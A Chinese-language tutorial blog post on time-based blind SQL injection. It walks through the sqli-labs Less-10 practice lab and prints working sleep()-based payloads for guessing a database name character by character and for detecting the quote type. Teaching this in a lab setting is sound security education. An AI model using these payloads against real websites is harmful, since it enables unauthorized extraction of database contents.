美文网首页
一步一步学习 Web 安全 2.7 时间盲注

一步一步学习 Web 安全 2.7 时间盲注

作者: f1a94e9a1ea7 | 来源:发表于2020-05-23 10:29 被阅读0次

原理

时间盲注和上一节的布尔盲注其实差不多,只是还多了一个场景:当无论什么情况下都显示一样的页面的时候可以用时间盲注,通过页面的响应时长来判断信息。

注入语句:
if(left(dababase(),1)='a',0,sleep(10));
这条语句表示如果当前库名的第一个字符是 a,那么页面会在10秒后才显示出来。

练习

sqli-labs 的 less-10:

  1. 注入判断
    url 后输入 id:?/id=1,页面返回:you are in
    输入:?id=1',页面返回:you are in
    输入:?id=1' and '1'='1,页面返回:you are in
    输入:?id=1' and '1'='2,页面返回:you are in
    不管什么情况页面返回的都是 you are in,那我们就可以用时间盲注通过页面返回 you are in 的时间来获取信息

  2. 获取信息

  • 猜测库名:
    输入:?id=1" and if(left(database(),1)='a',0,sleep(5)) --+
    可以看到网页上有个圈圈转了几秒之后才消失,说明库名第一个字符不是 a,替换 a 为别的字母,直到页面是马上响应表示当前字符是正确的。
    当然 if 判断也可以反过来,是正确的字符响应时间长,不是正确的马上响应:
    ?id=1" and if(left(database(),1)='a',sleep(5),0) --+
  • 查询其他数据同理。
  1. 单双引号
    不知道大家是否有注意,less-10 我用的是 『id=1"』,1 后面是一个双引号,前面小节用的都是单引号,因为 less-10 的代码本身是用的双引号。
    那么如何判断单双引号,同样也可以通过响应时长:
    输入:?id=1' and if(true, sleep(5), 0) --+,如果页面 5 秒后响应则是单引号
    输入:?id=1" and if(true, sleep(5), 0) --+,如果页面 5 秒后响应则是双引号

毕竟是 SQL 注入,还是需要对 SQL 语法有一定的了解,建议系统学习一下,注入起来也更加容易理解,哪里不懂要善用搜索。

总结

盲注本身原理是非常简单的,就两个反馈,正确和错误,通过这两个反馈来获取我们想要的数据,只是手工过于繁琐,有兴趣的可以学习使用工具,这里暂不深入。

相关文章

  • 一步一步学习 Web 安全 2.7 时间盲注

    原理 时间盲注和上一节的布尔盲注其实差不多,只是还多了一个场景:当无论什么情况下都显示一样的页面的时候可以用时间盲...

  • 一步一步学习 Web 安全 2.6 布尔盲注

    盲注 盲注表示存在 SQL 注入,但是页面只有正常显示和不显示两种,不会像之前直接显示错误或者数据在页面上。 盲注...

  • 一步一步学习 Web 安全 2.8 DNSlog 盲注

    原理 可能有人对 DNSlog 比较陌生,先简单说一下 DNS,想深入了解的可以跳转到 DNS 原理入门 进行学习...

  • Web安全系列——XSS攻击

    前段时间在学习Web安全方面的知识,对这方面有了进一步的了解,决定写文章记录下来,只是对Web安全方面知识的一些总...

  • 时间盲注

    时间盲注原理: 代码存在sql注入漏洞,然而页面既不会回显数据,也不会回显错误信息 语句执行后也不提示真假,我们不...

  • 时间盲注

    ctf练习平台的web15 看代码知道没有注入的回显,所以想到使用时间盲注。select case when......

  • 时间盲注

    sleep注入 获取库名 and sleep(if(ascii(substr(database(),1,1))<1...

  • 一步一步学习 Web 安全 2.5 报错注入

    原理 利用数据库某些机制让数据库报错,在报错中获取数据。有一点局限的是需要页面有错误回显。 场景 查询不回显内容,...

  • Kali Linux系统利用DVWA靶场进测试SQL注入漏洞:

    手工盲注: 手工盲注分为基于布尔的盲注、基于时间的盲注以及基于报错的盲注,手工盲注步骤:1.判断是否存在注入,注入...

  • 盲注

    盲注:1.基于布尔的SQL盲注。 2.基于时间的SQL盲注。 3.基于报错的SQL盲注。 布尔SQL盲注:逻辑判断...

网友评论

      本文标题:一步一步学习 Web 安全 2.7 时间盲注

      本文链接:https://www.haomeiwen.com/subject/jpckahtx.html